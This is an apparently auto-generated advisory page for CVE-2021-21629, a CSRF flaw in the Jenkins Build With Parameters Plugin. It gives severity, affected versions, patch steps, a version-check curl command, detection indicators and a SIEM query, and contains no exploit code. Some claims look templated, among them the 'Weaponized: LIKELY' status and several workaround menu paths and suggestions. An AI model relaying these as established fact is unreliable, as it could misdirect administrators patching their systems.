CVE-2021-21629 – This CSRF vulnerability in Jenkins Build With P... (How to Fix)

Q: What is the severity of CVE-2021-21629?

CVE-2021-21629 has a CVSS score of 8.8 (HIGH). This CSRF vulnerability in Jenkins Build With Parameters Plugin allows attackers to trick authenticated users into unknowingly triggering builds with malicious parameters. It affects Jenkins instances using the vulnerable plugin version, potentially leading to unauthorized code execution or configuration changes.

📋 TL;DR

This CSRF vulnerability in Jenkins Build With Parameters Plugin allows attackers to trick authenticated users into unknowingly triggering builds with malicious parameters. It affects Jenkins instances using the vulnerable plugin version, potentially leading to unauthorized code execution or configuration changes.

💻 Affected Systems

Products:

Jenkins Build With Parameters Plugin

Versions: 1.5 and earlier

Operating Systems: All platforms running Jenkins

Default Config Vulnerable: ⚠️ Yes

Notes: Requires Jenkins with the vulnerable plugin installed and enabled. Attack requires authenticated user session.

📦 What is this software?

Build With Parameters by Jenkins

View all CVEs affecting Build With Parameters →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could execute arbitrary code on Jenkins agents, steal credentials, modify build configurations, or deploy malicious artifacts to production environments.

🟠

Likely Case

Attackers could trigger builds with malicious parameters to exfiltrate sensitive data, disrupt CI/CD pipelines, or inject malicious code into build artifacts.

🟢

If Mitigated

With proper CSRF protections and access controls, impact is limited to authorized parameter changes within existing project permissions.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires tricking authenticated users into visiting malicious pages. CSRF tokens are not properly validated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.6 or later

Vendor Advisory: https://www.jenkins.io/security/advisory/2021-03-30/#SECURITY-2257

Restart Required: Yes

Instructions:

1. Update Jenkins Build With Parameters Plugin to version 1.6 or later via Jenkins Plugin Manager. 2. Restart Jenkins to apply the update. 3. Verify plugin version in Manage Jenkins > Manage Plugins.

🔧 Temporary Workarounds

Enable CSRF Protection

all

Ensure Jenkins global security has CSRF protection enabled

Navigate to Manage Jenkins > Configure Global Security > Enable 'Prevent Cross Site Request Forgery exploits'

Restrict Build Permissions

all

Limit who can build projects to reduce attack surface

Navigate to each project's configuration > Build Triggers > Restrict build permissions

🧯 If You Can't Patch

Implement strict network segmentation and firewall rules to limit Jenkins access
Use browser extensions that block CSRF attempts and educate users about phishing risks

🔍 How to Verify

Check if Vulnerable:

Check plugin version in Manage Jenkins > Manage Plugins > Installed tab > Build With Parameters Plugin

Check Version:

curl -s http://jenkins-host/pluginManager/api/json?depth=1 | grep -o '"Build With Parameters Plugin[^}]*' | grep -o '"version":"[^"]*'

Verify Fix Applied:

Verify plugin version is 1.6 or higher and test CSRF protection by attempting to trigger builds without proper tokens

📡 Detection & Monitoring

Log Indicators:

Unexpected build triggers with unusual parameters
Failed CSRF token validation attempts in Jenkins logs

Network Indicators:

HTTP POST requests to /job/*/buildWithParameters without proper referrer headers
Multiple build triggers from same IP with different parameters

SIEM Query:

source="jenkins.log" AND ("CSRF" OR "buildWithParameters") AND status="200"

📊 Metadata

CVE ID: CVE-2021-21629

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-352

Published: March 30, 2021

Last Updated: November 21, 2024

🔗 References

http://www.openwall.com/lists/oss-security/2021/03/30/1 Mailing List,Third Party Advisory
https://www.jenkins.io/security/advisory/2021-03-30/#SECURITY-2257 Vendor Advisory
http://www.openwall.com/lists/oss-security/2021/03/30/1 Mailing List,Third Party Advisory
https://www.jenkins.io/security/advisory/2021-03-30/#SECURITY-2257 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-21629, you might also want to check these: